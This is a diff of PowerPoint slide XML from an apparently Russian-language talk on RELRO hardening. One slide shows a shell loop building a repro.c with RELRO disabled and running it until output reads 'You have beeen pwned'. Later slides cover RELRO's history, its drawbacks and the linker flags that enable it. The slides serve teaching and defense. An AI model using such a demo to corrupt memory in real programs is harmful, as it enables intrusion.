+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl9pPr>
+          </a:lstStyle>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>$ for </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>i</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t> in `seq 0 16`; do</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>    </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>gcc</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t> -</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>Wl</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>,-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>z,norelro</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>repro.c</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t> -DPOS=$</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>i</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>    ./</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>a.out</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>    </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>i</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>=$((</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>i</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t> + 1))</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>  done</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>  Segmentation fault</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>  Segmentation fault</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>  Segmentation fault</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" b="1" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>  You have </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" b="1" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>beeen</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" b="1" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" b="1" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>pwned</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" b="1" dirty="0">
+              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>  Hello world!</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>  Hello world!</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>  Hello world!</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>  ...</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4165890631"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2956310077"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -15372,6 +16059,793 @@
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
         <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1953492814"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide50.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Title 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B8E7810-D0A8-4634-93F0-ED0AC0D81DED}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>История</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Content Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{801672DB-F6AD-4CB3-A053-3E47CCBF67BF}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr>
+            <a:normAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Подход RELRO уже использовался ранее для инициализации vtables </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>(partial RELRO)</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>Ian Lance Taylor</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>: Linker </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>relro</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Потребовалась лишь небольшая адаптация для GOT</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> (full RELRO)</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="160064826"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide51.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Title 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C959E6E0-49FC-47E3-B907-3E8C02CEE8E1}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Недостатки</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Content Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65C5F9C5-D035-44BF-A73F-D04C9E2F3C20}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Практически не влияет на производительность</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Может только немного замедлить старт приложения из-за необходимости разрешения всех символов</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Не обнаружили никакого замедления в работе компилятора </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Clang</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>False positives:</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Могут сломаться некоторые программы, если в них были отсутствующие символы (которые не вызывались)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>False negatives:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Не защищает пользовательские таблицы функций</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="826898882"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide52.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Title 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24F65176-1DCF-40BE-BC3B-1D07413D3E26}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Как включить</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> ?</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Content Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B75EE06-796F-4150-9967-C80D9D14B36F}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr>
+            <a:normAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Опции линкера для включения </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Full RELRO:</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-Wl,-z,now -Wl,-z,relro</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>В Ubuntu включены по умолчанию в GCC, но не в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Clang (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Clang </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>только </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>partial RELRO</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>В Debian и </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Fedora </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>не включены по умолчанию ни в GCC, ни в Clang</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Использование в реальных проектах</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>В </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Ubuntu </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>и Fefora пакеты дефолтно собираются с </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>F</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>ull RELRO</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>В пакетах Debian </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Full RELRO</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> дефолтно не включён</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>TODO: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>браузеры</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="935747203"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
